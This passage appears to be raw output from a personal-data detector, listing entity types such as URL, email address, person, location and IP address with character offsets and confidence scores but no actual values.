1634, score: 0.5, type: URL, start: 1834, end: 1848, score: 0.5, type: URL, start: 1878, end: 1883, score: 0.5, type: EMAIL_ADDRESS, start: 342, end: 371, score: 1.0, type: EMAIL_ADDRESS, start: 373, end: 388, score: 1.0, type: EMAIL_ADDRESS, start: 436, end: 469, score: 1.0, type: EMAIL_ADDRESS, start: 471, end: 486, score: 1.0, type: PERSON, start: 305, end: 323, score: 0.85, type: PERSON, start: 325, end: 336, score: 0.85, type: PERSON, start: 395, end: 417, score: 0.85, type: PERSON, start: 419, end: 430, score: 0.85, type: URL, start: 517, end: 563, score: 0.6, type: IP_ADDRESS, start: 1461, end: 1462, score: 0.6, type: IP_ADDRESS, start: 1474, end: 1478, score: 0.6, type: URL, start: 135, end: 145, score: 0.5, type: URL, start: 148, end: 153, score: 0.5, type: URL, start: 365, end: 371, score: 0.5, type: URL, start: 379, end: 388, score: 0.5, type: URL, start: 463, end: 469, score: 0.5, type: URL, start: 477, end: 486, score: 0.5, type: URL, start: 703, end: 712, score: 0.5, type: URL, start: 760, end: 773, score: 0.5, type: URL, start: 1573, end: 1586, score: 0.5, type: EMAIL_ADDRESS, start: 1972, end: 1987, score: 1.0, type: EMAIL_ADDRESS, start: 2654, end: 2669, score: 1.0, type: LOCATION, start: 1035, end: 1052, score: 0.85, type: PERSON, start: 1301, end: 1315, score: 0.85, type: PERSON, start: 1682, end: 1685, score: 0.85, type: PERSON, start: 1920, end: 1936, score: 0.85, type: PERSON, start: 2364, end: 2367, score: 0.85, type: PERSON, start: 2602, end: 2618, score: 0.85, type: PERSON, start: 2754, end: 2769, score: 0.85, type: DATE_TIME, start: 4263, end: 4272, score: 0.85, type: LOCATION, start: 4482, end: 4494, score: 0.85, type: LOCATION, start: 4497, end: 4533, score: 0.85, type: PERSON, start: 5968, end: 5972, score: 0.85, type: PERSON, start: 8666, end: 8670, score: 0.85, type: LOCATION, start: 9615, end: 9627, score: 0.85, type: PERSON, start: 11352, end: 11376, score: 0.85, type: URL, start: 170, end: 198, score: 0.6, type: URL, start: 250, end: 265, score: 0.5, type: URL, start: 287, end: 294, score: 0.5, type: URL, start: 346, end: 376, score: 0.5, type: URL, start: 515, end: 525, score: 0.5, type: URL, start: 962, end: 980, score: 0.5, type: URL, start: 1160, end: 1190, score: 0.5, type: URL, start: 1301, end: 1309, score: 0.5, type: URL, start: 1978, end: 1987, score: 0.5, type: URL, start: 2660, end: 2669, score: 0.5, type: URL, start: 2770, end: 2778, score: 0.5, type: URL, start: 3147, end: 3155, score: 0.5, type: URL, start: 3341, end: 3351, score: 0.5, type: URL, start: 3468, end: 3477, score: 0.5, type: URL, start: 3580, end: 3599, score: 0.5, type: URL, start: 3794, end: 3812, score: 0.5, type: URL, start: 3924, end: 3933, score: 0.5, type: URL, start: 3972, end: 3991, score: 0.5, type: URL, start: 4005, end: 4023, score: 0.5, type: URL, start: 4191, end: 4198, score: 0.5, type: URL, start: 4239, end: 4246, score: 0.5, type: URL, start: 11894, end: 11901, score: 0.5, type: URL, start: 12132, end: 12143, score: 0.5, type: URL, start: 12287, end: 12294, score: 0.5, type: URL, start: 12348, end: 12355, score: 0.5, type: URL, start: 12436, end: 12447, score: 0.5, type: EMAIL_ADDRESS, start: 226, end: 241, score: 1.0, type: DATE_TIME, start: 120, end: 124, score: 0.85, type: PERSON, start: 126, end: 144, score: 0.85, type: PERSON, start: 206, end: 224, score: 0.85, type: PERSON, start: 497, end: 501, score: 0.85, type: PERSON, start: 506, end: 510, score: 0.85, type: PERSON, start: 796, end: 800, score: 0.85, type: URL, start: 232, end: 241, score: 0.5, type: URL, start: 820, end: 826, score: 0.5, type: URL, start: 831, end: 837, score: 0.5, type: URL, start: 859, end: 865, score: 0.5, type: URL, start: 870, end: 876, score: 0.5, type: URL, start: 898, end: 904, score: 0.5, type: URL, start: 909, end: 915, score: 0.5, type: URL, start: 937, end: 943, score: 0.5, type: URL, start: 948, end: 954, score: 0.5, type: URL, start: 976, end: 982, score: 0.5, type: URL, start: 987, end: 993, score: 0.5, type: URL, start: 1015, end: 1021, score: 0.5, type: URL, start: 1026, end: 1032, score: 0.5, type: URL, start: 1054, end: 1060, score: 0.5, type: URL, start: 1065, end: 1071, score: 0.5, type: URL, start: 1093, end: 1099, score: 0.5, type: URL, start: 1104, end: 1110, score: 0.5, type: URL, start: 1132, end: 1138, score: 0.5, type: URL, start: 1143, end: 1149, score: 0.5, type: URL, start: 1171, end: 1177, score: 0.5, type: URL, start: 1182, end: 1188, score: 0.5, type: URL, start: 1210, end: 1216, score: 0.5, type: URL, start: 1221, end: 1227, score: 0.5, type: URL, start: 1249, end: 1255, score: 0.5, type: URL, start: 1260, end: 1266, score: 0.5, type: URL, start: 1288, end: 1294, score: 0.5, type: URL, start: 1299, end: 1305, score: 0.5, type: URL, start: 1327, end: 1333, score: 0.5, type: URL, start: 1338, end: 1344, score: 0.5, type: URL, start: 1367, end: 1373, score: 0.5, type: URL, start: 1378, end: 1384, score: 0.5, type: URL, start: 1408, end: 1414, score: 0.5, type: URL, start: 1419, end: 1425, score: 0.5, type: URL, start: 1447, end: 1453, score: 0.5, type: URL, start: 1458, end: 1464, score: 0.5, type: URL, start: 1486, end: 1492, score: 0.5, type: URL, start: 1497, end: 1503, score: 0.5, type: URL, start: 1525, end: 1531, score: 0.5, type: URL, start: 1536, end: 1542, score: 0.5, type: URL, start: 1565, end: 1571, score: 0.5, type: URL, start: 1576, end: 1582, score: 0.5, type: URL, start: 1604, end: 1610, score: 0.5, type: URL, start: 1615, end: 1621, score: 0.5, type: URL, start: 1643, end: 1649, score: 0.5, type: URL, start: 1654, end: 1660, score: 0.5, type: URL, start: 1683, end: 1689, score: 0.5, type: URL, start: 1694, end: 1700, score: 0.5, type: URL, start: 1723, end: 1729, score: 0.5, type: URL, start: 1734, end: 1740, score: 0.5, type: URL, start: 1764, end: 1770, score: 0.5, type: URL, start: 1775, end: 1781, score: 0.5, type: URL, start: 1805, end: 1811, score: 0.5, type: URL, start: 1816, end: 1822, score: 0.5, type: EMAIL_ADDRESS, start: 251, end: 266, score: 1.0, type: PERSON, start: 234, end: 249, score: 0.85, type: NRP, start: 432, end: 440, score: 0.85, type: PERSON, start: 628, end: 635, score: 0.85, type: PERSON, start: 1349, end: 1373, score: 0.85, type: DATE_TIME, start: 2730, end: 2740, score: 0.85, type: PERSON, start: 3429, end: 3452, score: 0.85, type: LOCATION, start: 3830, end: 3838, score: 0.85, type: NRP, start: 4347, end: 4370, score: 0.85, type: LOCATION, start: 4480, end: 4482, score: 0.85, type: PERSON, start: 7295, end: 7302, score: 0.85, type: PERSON, start: 9834, end: 9841, score: 0.85, type: NRP, start: 13314, end: 13328, score: 0.85, type: PERSON, start: 14281, end: 14295, score: 0.85, type: PERSON, start: 15102, end: 15119, score: 0.85, type: URL, start: 192, end: 220, score: 0.6, type: URL, start: 1154, end: 1214, score: 0.6, type: URL, start: 257, end: 266, score: 0.5, type: URL, start: 664, end: 671, score: 0.5, type: URL, start: 732, end: 738, score: 0.5, type: URL, start: 769, end: 775, score: 0.5, type: URL, start: 1967, end: 1973, score: 0.5, type: URL, start: 1987, end: 1993, score: 0.5, type: URL, start: 2019, end: 2025, score: 0.5, type: URL, start: 2040, end: 2051, score: 0.5, type: URL, start: 2074, end: 2080, score: 0.5, type: URL, start: 2573, end: 2593, score: 0.5, type: URL, start: 2613, end: 2625, score: 0.5, type: URL, start: 2650, end: 2662, score: 0.5, type: URL, start: 2672, end: 2684, score: 0.5, type: URL, start: 2711, end: 2717, score: 0.5, type: URL, start: 2872, end: 2884, score: 0.5, type: URL, start: 2952, end: 2964, score: 0.5, type: URL, start: 3047, end: 3059, score: 0.5, type: URL, start: 3122, end: 3133, score: 0.5, type: URL, start: 3154, end: 3166, score: 0.5, type: URL, start: 3168, end: 3179, score: 0.5, type: URL, start: 3376, end: 3382, score: 0.5, type: URL, start: 3388, end: 3394, score: 0.5, type: URL, start: 3501, end: 3507, score: 0.5, type: URL, start: 3840, end: 3846, score: 0.5, type: URL, start: 3855, end: 3861, score: 0.5, type: URL, start: 3919, end: 3925, score: 0.5, type: URL, start: 4711, end: 4722, score: 0.5, type: URL, start: 4772, end: 4783, score: 0.5, type: URL, start: 4829, end: 4840, score: 0.5, type: URL, start: 4894, end: 4905, score: 0.5, type: URL, start: 5379, end: 5390, score: 0.5, type: URL, start: 5545, end: 5556, score: 0.5, type: URL, start: 5613, end: 5624, score: 0.5, type: URL, start: 6306, end: 6312, score: 0.5, type: URL, start: 6461, end: 6469, score: 0.5, type: URL, start: 7204, end: 7210, score: 0.5, type: URL, start: 7215, end: 7221, score: 0.5, type: URL, start: 7328, end: 7341, score: 0.5, type: URL, start: 8343, end: 8349, score: 0.5, type: URL, start: 8552, end: 8561, score: 0.5, type: URL, start: 8579, end: 8585, score: 0.5, type: URL, start: 8790, end: 8803, score: 0.5, type: URL, start: 9867, end: 9880, score: 0.5, type: URL, start: 10899, end: 10905, score: 0.5, type: URL, start: 11108, end: 11117, score: 0.5, type: URL, start: 11135, end: 11141, score: 0.5, type: URL, start: 11346, end: 11359, score: 0.5, type: URL, start: 12445, end: 12451, score: 0.5, type: URL, start: 12467, end: 12473, score: 0.5, type: URL, start: 12525, end: 12531, score: 0.5, type: URL, start: 12536, end: 12542, score: 0.5, type: URL, start: 13314, end: 13320, score: 0.5, type: URL, start: 13393, end: 13406, score: 0.5, type: URL, start: 13535, end: 13548, score: 0.5, type: URL, start: 13953, end: 13960, score: 0.5, type: URL, start: 14009, end: 14019, score: 0.5, type: URL, start: 14054, end: 14061, score: 0.5, type: URL, start: 14068, end: 14078, score: 0.5, type: URL, start: 14082, end: 14089, score: 0.5, type: URL, start: 14113, end: 14120, score: 0.5, type: URL, start: 14201, end: 14215, score: 0.5, type: URL, start: 14255, end: 14264, score: 0.5, type: URL, start: 14281, end: 14290, score: 0.5, type: URL, start: 14348, end: 14354, score: 0.5, type: URL, start: 14384, end: 14391, score: 0.5, type: URL, start: 14401, end: 14411, score: 0.5, type: URL, start: 14467, end: 14476, score: 0.5, type: URL, start: 14487, end: 14498, score: 0.5, type: URL, start: 14505, end: 14516, score: 0.5, type: URL, start: 14528, end: 14539, score: 0.5, type: URL, start: 14706, end: 14713, score: 0.5, type: URL, start: 14760, end: 14767, score: 0.5, type: URL, start: 14810, end: 14819, score: 0.5, type: URL, start: 14839, end: 14846, score: 0.5, type: URL, start: 14862, end: 14871, score: 0.5, type: URL, start: 14881, end: 14890, score: 0.5, type: URL, start: 14931, end: 14938, score: 0.5, type: URL, start: 14991, end: 14997, score: 0.5, type: URL, start: 15142, end: 15151, score: 0.5, type: URL, start: 15155, end: 15164, score: 0.5, type: URL, start: 15172, end: 15181, score: 0.5, type: URL, start: 15185, end: 15194, score: 0.5, type: URL, start: 15265, end: 15270, score: 0.5, type: URL, start: 15297, end: 15308, score: 0.5, type: URL, start: 15347, end: 15358, score: 0.5, type: URL, start: 15367, end: 15378, score: 0.5, type: URL, start: 15413, end: 15424, score: 0.5, type: URL, start: 15762, end: 15768, score: 0.5, type: URL, start: 15780, end: 15786, score: 0.5, type: EMAIL_ADDRESS, start: 85, end: 100, score: 1.0, type: DATE_TIME, start: 61, end: 65, score: 0.85, type: PERSON, start: 67, end: 84, score: 0.85, type: DATE_TIME, start: 1401, end: 1429, score: 0.85, type: URL, start: 731, end: 759, score: 0.6, type: URL, start: 91, end: 100, score: 0.5, type: URL, start: 781, end: 791, score: 0.5, type: URL, start: 1205, end: 1221, score: 0.5, type: URL, start: 1360, end: 1368, score: 0.5, type: URL, start: 1495, end: 1503, score: 0.5, type: URL, start: 1512, end: 1520, score: 0.5, type: URL, start: 1661, end: 1668, score: 0.5, type: URL, start: 1705, end: 1713, score: 0.5, type: URL, start: 1722, end: 1730, score: 0.5, type: URL, start: 1872, end: 1881, score: 0.5, type: URL, start: 1933, end: 1941, score: 0.5, type: URL, start: 1972, end: 1980, score: 0.5, type: URL, start: 1988, end: 1996, score: 0.5, type: URL, start: 2020, end: 2028, score: 0.5, type: LOCATION, start: 54, end: 58, score: 0.85, type: LOCATION, start: 539, end: 547, score: 0.85, type: LOCATION, start: 934, end: 942, score: 0.85, type: PERSON, start: 1889, end: 1897, score: 0.85, type: PERSON, start: 2528, end: 2535, score: 0.85, type: PERSON, start: 2641, end: 2648, score: 0.85, type: PERSON, start: 3898, end: 3907, score: 0.85, type: LOCATION, start: 5026, end: 5032, score: 0.85, type: PERSON, start: 5172, end: 5186, score: 0.85, type: IP_ADDRESS, start: 4525, end: 4534, score: 0.6, type: IP_ADDRESS, start: 5159, end: 5168, score: 0.6, type: URL, start: 92, end: 98, score: 0.5, type: URL, start: 282, end: 300, score: 0.5, type: URL, start: 397, end: 415, score: 0.5, type: URL, start: 500, end: 510, score: 0.5, type: URL, start: 895, end: 905, score: 0.5, type: URL, start: 1040, end: 1047, score: 0.5, type: URL, start: 1130, end: 1141, score: 0.5, type: URL, start: 1155, end: 1162, score: 0.5, type: URL, start: 1329, end: 1344, score: 0.5, type: URL, start: 1356, end: 1367, score: 0.5, type: URL, start: 1379, end: 1386, score: 0.5, type: URL, start: 1428, end: 1435, score: 0.5, type: URL, start: 1466, end: 1477, score: 0.5, type: URL, start: 1585, end: 1592, score: 0.5, type: URL, start: 1649, end: 1656, score: 0.5, type: URL, start: 1685, end: 1691, score: 0.5, type: URL, start: 1826, end: 1832, score: 0.5, type: URL, start: 1876, end: 1891, score: 0.5, type: URL, start: 1976, end: 1991, score: 0.5, type: URL, start: 2108, end: 2119, score: 0.5, type: URL, start: 2137, end: 2148, score: 0.5, type: URL, start: 2350, end: 2361, score: 0.5, type: URL, start: 2408, end: 2415, score: 0.5, type: URL, start: 2548, end: 2553, score: 0.5, type: URL, start: 2562, end: 2567, score: 0.5, type: URL, start: 2615, end: 2620, score: 0.5, type: URL, start: 2696, end: 2700, score: 0.5, type: URL, start: 2707, end: 2718, score: 0.5, type: URL, start: 3176, end: 3183, score: 0.5, type: URL, start: 3317, end: 3328, score: 0.5, type: URL, start: 3390, end: 3401, score: 0.5, type: URL, start: 3523, end: 3534, score: 0.5, type: URL, start: 3689, end: 3700, score: 0.5, type: URL, start: 3868, end: 3875, score: 0.5, type: URL, start: 3945, end: 3955, score: 0.5, type: URL, start: 3986, end: 4002, score: 0.5, type: URL, start: 4037, end: 4053, score: 0.5, type: URL, start: 4114, end: 4121, score: 0.5, type: URL, start: 4348, end: 4355, score: 0.5, type: URL, start: 4415, end: 4426, score: 0.5, type: URL, start: 4462, end: 4471, score: 0.5, type: URL, start: 4506, end: 4511, score: 0.5, type: URL, start: 4557, end: 4566, score: 0.5, type: URL, start: 4601, end: 4606, score: 0.5, type: URL, start: 4666, end: 4675, score: 0.5, type: URL, start: 4705, end: 4710, score: 0.5, type: URL, start: 4811, end: 4820, score: 0.5, type: URL, start: 4943, end: 4952, score: 0.5, type: URL, start: 4984, end: 4989, score: 0.5, type: URL, start: 5094, end: 5103, score: 0.5, type: URL, start: 5136, end: 5141, score: 0.5, type: URL, start: 5215, end: 5224, score: 0.5, type: URL, start: 5317, end: 5326, score: 0.5, type: URL, start: 5342, end: 5349, score: 0.5, type: URL, start: 5358, end: 5368, score: 0.5, type: URL, start: 5384, end: 5394, score: 0.5, type: URL, start: 5408, end: 5418, score: 0.5, type: URL, start: 5434, end: 5444, score: 0.5, type: URL, start: 5455, end: 5465, score: 0.5, type: URL, start: 5514, end: 5520, score: 0.5, type: URL, start: 5583, end: 5589, score: 0.5, type: IP_ADDRESS, start: 95252, end: 95261, score: 0.95, type: IP_ADDRESS, start: 96314, end: 96323, score: 0.95, type: DATE_TIME, start: 81, end: 90, score: 0.85, type: PERSON, start: 1077, end: 1097, score: 0.85, type: PERSON, start: 1112, end: 1118, score: 0.85, type: PERSON, start: 1124, end: 1144, score: 0.85, type: PERSON, start: 1437, end: 1444, score: 0.85, type: PERSON, start: 1528, end: 1546, score: 0.85, type: PERSON, start: 1804, end: 1812, score: 0.85, type: PERSON, start: 3377, end: 3385, score: 0.85, type: LOCATION, start: 3534, end: 3547, score: 0.85, type: PERSON, start: 4731, end: 4734, score: 0.85, type: PERSON, start: 4738, end: 4741, score: 0.85, type: PERSON, start: 5121, end: 5124, score: 0.85, type: LOCATION, start: 5429, end: 5437, score: 0.85, type: LOCATION, start: 6751, end: 6759, score: 0.85, type: LOCATION, start: 8096, end: 8104, score: 0.85, type: PERSON, start: 8824, end: 8827, score: 0.85, type: PERSON, start: 8834, end: 8837, score: 0.85, type: LOCATION, start: 8991, end: 8999, score: 0.85, type: PERSON, start: 14294, end: 14297, score: 0.85, type: PERSON, start: 14341, end: 14344, score: 0.85, type: PERSON, start: 14989, end: 14992, score: 0.85, type: PERSON, start: 15036, end: 15039, score: 0.85, type: PERSON, start: 16452, end: 16457, score: 0.85, type: PERSON, start: 17105, end: 17110, score: 0.85, type: PERSON, start: 17509, end: 17517, score: 0.85, type: PERSON, start: 17904, end: 17907, score: 0.85, type: PERSON, start: 17971, end: 17974, score: 0.85, type: URL, start: 18395, end: 18402, score: 0.85, type: URL, start: 18861, end: 18868, score: 0.85, type: URL, start: 19003, end: 19010, score: 0.85, type: URL, start: 19140, end: 19147, score: 0.85, type: URL, start: 19188, end: 19195, score: 0.85, type: PERSON, start: 19526, end: 19529, score: 0.85, type: PERSON, start: 19593, end: 19596, score: 0.85, type: PERSON, start: 46234, end: 46237, score: 0.85, type: PERSON, start: 47167, end: 47170, score: 0.85, type: PERSON, start: 47223, end: 47226, score: 0.85, type: PERSON, start: 51294, end: 51297, score: 0.85, type: PERSON, start: 51346, end: 51349, score: 0.85, type: LOCATION, start: 55527, end: 55552, score: 0.85, type: URL, start: 56502, end: 56508, score: 0.85, type: PERSON, start: 63226, end: 63257, score: 0.85, type: NRP, start: 70531, end: 70540, score: 0.85, type: NRP, start: 70975, end: 70984, score: 0.85, type: PERSON, start: 71967, end: 71985, score: 0.85, type: NRP, start: 72508, end: 72517, score: 0.85, type: PERSON, start: 72839, end: 72857, score: 0.85, type: PERSON, start: 73470, end: 73488, score: 0.85, type: PERSON, start: 75104, end: 75122, score: 0.85, type: PERSON, start: 76457, end: 76475, score: 0.85, type: PERSON, start: 77091, end: 77109, score: 0.85, type: PERSON, start: 77677, end: 77695, score: 0.85, type: PERSON, start: 79595, end: 79613, score: 0.85, type: PERSON, start: 80057, end: 80075, score: 0.85, type: PERSON, start: 80519, end: 80537, score: 0.85, type: PERSON, start: 80986, end: 81004, score: 0.85, type: DATE_TIME, start: 83103, end: 83133, score: 0.85, type: DATE_TIME, start: 83869, end: 83899, score: 0.85, type: DATE_TIME, start: 84985, end: 85015, score: 0.85, type: PERSON, start: 85721, end: 85739, score: 0.85, type: PERSON, start: 86172, end: 86188, score: 0.85, type: DATE_TIME, start: 86189, end: 86219, score: 0.85, type: PERSON, start: 86642, end: 86658, score: 0.85, type: PERSON, start: 86659, end: 86677, score: 0.85, type: PERSON, start: 87024, end: 87042, score: 0.85, type: PERSON, start: 89645, end: 89660, score: 0.85, type: PERSON, start: 89722, end: 89731, score: 0.85, type: PERSON, start: 92533, end: 92539, score: 0.85, type: PERSON, start: 92864, end: 92871, score: 0.85, type: PERSON, start: 93427, end: 93434, score: 0.85, type: PERSON, start: 94494, end: 94501, score: 0.85, type: DATE_TIME, start: 95540, end: 95542, score: 0.85, type: DATE_TIME, start: 96654, end: 96656, score: 0.85, type: PERSON, start: 97048, end: 97090, score: 0.85, type: PERSON, start: 97508, end: 97550, score: 0.85, type: LOCATION, start: 97804, end: 97828, score: 0.85, type: LOCATION, start: 98268, end: 98294, score: 0.85, type: PERSON, start: 99298, end: 99301, score: 0.85, type: PERSON, start: 99357, end: 99360, score: 0.85, type: PERSON, start: 101409, end: 101420, score: 0.85, type: PERSON, start: 108182, end: 108193, score: 0.85, type: PERSON, start: 109031, end: 109042, score: 0.85, type: PERSON, start: 112843, end: 112854, score: 0.85, type: URL, start: 327, end: 369, score: 0.6, type: URL, start: 10450, end: 10483, score: 0.6, type: URL, start: 11127, end: 11160, score: 0.6, type: URL, start: 23569, end: 23599, score: 0.6, type: URL, start: 26417, end: 26442, score: 0.6, type: URL, start: 27239, end: 27264, score: 0.6, type: IP_ADDRESS, start: 90874, end: 90883, score: 0.6, type: IP_ADDRESS, start: 92732, end: 92741, score: 0.6, type: IP_ADDRESS, start: 94844, end: 94853, score: 0.6, type: IP_ADDRESS, start: 95906, end: 95915, score: 0.6, type: URL, start: 781, end: 788, score: 0.5, type: URL, start: 868, end: 882, score: 0.5, type: URL, start: 991, end: 1001, score: 0.5, type: URL, start: 1029, end: 1045, score: 0.5, type: URL, start: 1057, end: 1066, score: 0.5, type: URL, start: 1177, end: 1197, score: 0.5, type: URL, start: 1223, end: 1243, score: 0.5, type: URL, start: 1271, end: 1286, score: 0.5, type: URL, start: 1433, end: 1439, score: 0.5, type: URL, start: 1455, end: 1467, score: 0.5, type: URL, start: 1542, end: 1549, score: 0.5, type: URL, start: 1687, end: 1694, score: 0.5, type: URL, start: 1701, end: 1710, score: 0.5, type: URL, start: 1777, end: 1784, score: 0.5, type: URL, start: 1799, end: 1806, score: 0.5, type: URL, start: 2992, end: 2999, score: 0.5, type: URL, start: 3007, end: 3024, score: 0.5, type: URL, start: 3063, end: 3069, score: 0.5, type: URL, start: 3093, end: 3099, score: 0.5, type: URL, start: 3118, end: 3125, score: 0.5, type: URL, start: 3150, end: 3157, score: 0.5, type: URL, start: 3293, end: 3300, score: 0.5, type: URL, start: 3372, end: 3379, score: 0.5, type: URL, start: 3402, end: 3408, score: 0.5, type: URL, start: 3419, end: 3426, score: 0.5, type: URL, start: 3822, end: 3831, score: 0.5, type: URL, start: 4138, end: 4146, score: 0.5, type: URL, start: 4177, end: 4183, score: 0.5, type: URL, start: 4225, end: 4235, score: 0.5, type: URL, start: 4292, end: 4298, score: 0.5, type: URL, start: 4327, end: 4334, score: 0.5, type: URL, start: 4345, end: 4351, score: 0.5, type: URL, start: 4396, end: 4402, score: 0.5, type: URL, start: 4423, end: 4430, score: 0.5, type: URL, start: 4488, end: 4495, score: 0.5, type: URL, start: 5152, end: 5160, score: 0.5, type: URL, start: 5191, end: 5197, score: 0.5, type: URL, start: 5239, end: 5249, score: 0.5, type: URL, start: 5306, end: 5312, score: 0.5, type: URL, start: 5341, end: 5348, score: 0.5, type: URL, start: 5359, end: 5365, score: 0.5, type: URL, start: 5388, end: 5395, score: 0.5, type: URL, start: 5429, end: 5435, score: 0.5, type: URL, start: 5439, end: 5445, score: 0.5, type: URL, start: 5506, end: 5513, score: 0.5, type: URL, start: 5848, end: 5856, score: 0.5, type: URL, start: 5887, end: 5893, score: 0.5, type: URL, start: 5935, end: 5945, score: 0.5, type: URL, start: 6002, end: 6008, score: 0.5, type: URL, start: 6037, end: 6044, score: 0.5, type: URL, start: 6055, end: 6061, score: 0.5, type: URL, start: 6132, end: 6139, score: 0.5, type: URL, start: 6474, end: 6482, score: 0.5, type: URL, start: 6513, end: 6519, score: 0.5, type: URL, start: 6561, end: 6571, score: 0.5, type: URL, start: 6628, end: 6634, score: 0.5, type: URL, start: 6663, end: 6670, score: 0.5, type: URL, start: 6681, end: 6687, score: 0.5, type: URL, start: 6710, end: 6717, score: 0.5, type: URL, start: 6751, end: 6757, score: 0.5, type: URL, start: 6761, end: 6767, score: 0.5, type: URL, start: 6833, end: 6840, score: 0.5, type: URL, start: 7179, end: 7187, score: 0.5, type: URL, start: 7218, end: 7224, score: 0.5, type: URL, start: 7266, end: 7276, score: 0.5, type: URL, start: 7333, end: 7339, score: 0.5, type: URL, start: 7368, end: 7375, score: 0.5, type: URL, start: 7386, end: 7392, score: 0.5, type: URL, start: 7468, end: 7475, score: 0.5, type: URL, start: 7814, end: 7822, score: 0.5, type: URL, start: 7853, end: 7859, score: 0.5, type: URL, start: 7901, end: 7911, score: 0.5, type: URL, start: 7968, end: 7974, score: 0.5, type: URL, start: 8003, end: 8010, score: 0.5, type: URL, start: 8021, end: 8027, score: 0.5, type: URL, start: 8050, end: 8057, score: 0.5, type: URL, start: 8096, end: 8102, score: 0.5, type: URL, start: 8106, end: 8112, score: 0.5, type: URL, start: 8475, end: 8483, score: 0.5, type: URL, start: 8514, end: 8520, score: 0.5, type: URL, start: 8562, end: 8572, score: 0.5, type: URL, start: 8629, end: 8635, score: 0.5, type: URL, start: 8916, end: 8923, score: 0.5, type: URL, start: 8934, end: 8940, score: 0.5, type: URL, start: 8963, end: 8970, score: 0.5, type: URL, start: 8991, end: 8997, score: 0.5, type: URL, start: 9001, end: 9007, score: 0.5, type: URL, start: 9328, end: 9336, score: 0.5, type: URL, start: 9367, end: 9373, score: 0.5, type: URL, start: 9415, end: 9425, score: 0.5, type: URL, start: 9482, end: 9488, score: 0.5, type: URL, start: 9517, end: 9524, score: 0.5, type: URL, start: 9535, end: 9541, score: 0.5, type: URL, start: 9564, end: 9571, score: 0.5, type: URL, start: 9610, end: 9616, score: 0.5, type: URL, start: 9973, end: 9981, score: 0.5, type: URL, start: 10012, end: 10018, score: 0.5, type: URL, start: 10060, end: 10070, score: 0.5, type: URL, start: 10127, end: 10133, score: 0.5, type: URL, start: 10162, end: 10169, score: 0.5, type: URL, start: 10180, end: 10186, score: 0.5, type: URL, start: 10209, end: 10216, score: 0.5, type: URL, start: 10255, end: 10261, score: 0.5, type: URL, start: 10653, end: 10661, score: 0.5, type: URL, start: 10692, end: 10698, score: 0.5, type: URL, start: 10740, end: 10750, score: 0.5, type: URL, start: 10807, end: 10813, score: 0.5, type: URL, start: 10842, end: 10849, score: 0.5, type: URL, start: 10860, end: 10866, score: 0.5, type: URL, start: 10889, end: 10896, score: 0.5, type: URL, start: 10930, end: 10936, score: 0.5, type: URL, start: 11286, end: 11294, score: 0.5, type: URL, start: 11325, end: 11331, score: 0.5, type: URL, start: 11373, end: 11383, score: 0.5, type: URL, start: 11440, end: 11446, score: 0.5, type: URL, start: 11475, end: 11482, score: 0.5, type: URL, start: 11493, end: 11499, score: 0.5, type: URL, start: 11913, end: 11921, score: 0.5, type: URL, start: 11952, end: 11958, score: 0.5, type: URL, start: 12000, end: 12010, score: 0.5, type: URL, start: 12066, end: 12072, score: 0.5, type: URL, start: 12101, end: 12108, score: 0.5, type: URL, start: 12119, end: 12125, score: 0.5, type: URL, start: 12171, end: 12177, score: 0.5, type: URL, start: 12198, end: 12205, score: 0.5, type: URL, start: 12384, end: 12392, score: 0.5, type: URL, start: 12437, end: 12443, score: 0.5, type: URL, start: 12549, end: 12555, score: 0.5, type: URL, start: 12584, end: 12591, score: 0.5, type: URL, start: 12602, end: 12608, score: 0.5, type: URL, start: 12654, end: 12660, score: 0.5, type: URL, start: 12776, end: 12783, score: 0.5, type: URL, start: 12832, end: 12839, score: 0.5, type: URL, start: 13295, end: 13303, score: 0.5, type: URL, start: 13334, end: 13340, score: 0.5, type: URL, start: 13362, end: 13368, score: 0.5, type: URL, start: 13423, end: 13433, score: 0.5, type: URL, start: 13489, end: 13495, score: 0.5, type: URL, start: 13524, end: 13531, score: 0.5, type: URL, start: 13542, end: 13548, score: 0.5, type: URL, start: 13740, end: 13747, score: 0.5, type: URL, start: 13845, end: 13853, score: 0.5, type: URL, start: 13884, end: 13890, score: 0.5, type: URL, start: 13932, end: 13942, score: 0.5, type: URL, start: 13999, end: 14005, score: 0.5, type: URL, start: 14034, end: 14041, score: 0.5, type: URL, start: 14052, end: 14058, score: 0.5, type: URL, start: 14138, end: 14145, score: 0.5, type: URL, start: 14472, end: 14480, score: 0.5, type: URL, start: 14511, end: 14517, score: 0.5, type: URL, start: 14540, end: 14546, score: 0.5, type: URL, start: 14556, end: 14567, score: 0.5, type: URL, start: 14581, end: 14588, score: 0.5, type: URL, start: 14635, end: 14645, score: 0.5, type: URL, start: 14702, end: 14708, score: 0.5, type: URL, start: 14737, end: 14744, score: 0.5, type: URL, start: 14755, end: 14761, score: 0.5, type: URL, start: 14833, end: 14840, score: 0.5, type: URL, start: 15123, end: 15131, score: 0.5, type: URL, start: 15162, end: 15168, score: 0.5, type: URL, start: 15191, end: 15197, score: 0.5, type: URL, start: 15209, end: 15216, score: 0.5, type: URL, start: 15262, end: 15272, score: 0.5, type: URL, start: 15329, end: 15335, score: 0.5, type: URL, start: 15364, end: 15371, score: 0.5, type: URL, start: 15382, end: 15388, score: 0.5, type: URL, start: 15487, end: 15494, score: 0.5, type: URL, start: 15896, end: 15904, score: 0.5, type: URL, start: 15935, end: 15941, score: 0.5, type: URL, start: 15983, end: 15993, score: 0.5, type: URL, start: 16043, end: 16049, score: 0.5, type: URL, start: 16086, end: 16092, score: 0.5, type: URL, start: 16121, end: 16128, score: 0.5, type: URL, start: 16139, end: 16145, score: 0.5, type: URL, start: 16242, end: 16249, score: 0.5, type: URL, start: 16541, end: 16549, score: 0.5, type: URL, start: 16580, end: 16586, score: 0.5, type: URL, start: 16609, end: 16615, score: 0.5, type: URL, start: 16666, end: 16676, score: 0.5, type: URL, start: 16733, end: 16739, score: 0.5, type: URL, start: 16768, end: 16775, score: 0.5, type: URL, start: 16786, end: 16792, score: 0.5, type: URL, start: 16895, end: 16902, score: 0.5, type: URL, start: 17194, end: 17202, score: 0.5, type: URL, start: 17233, end: 17239, score: 0.5, type: URL, start: 17261, end: 17267, score: 0.5, type: URL, start: 17318, end: 17328, score: 0.5, type: URL, start: 17385, end: 17391, score: 0.5, type: URL, start: 17420, end: 17427, score: 0.5, type: URL, start: 17438, end: 17444, score: 0.5, type: URL, start: 17504, end: 17511, score: 0.5, type: URL, start: 17535, end: 17543, score: 0.5, type: URL, start: 17574, end: 17580, score: 0.5, type: URL, start: 17602, end: 17608, score: 0.5, type: URL, start: 17667, end: 17677, score: 0.5, 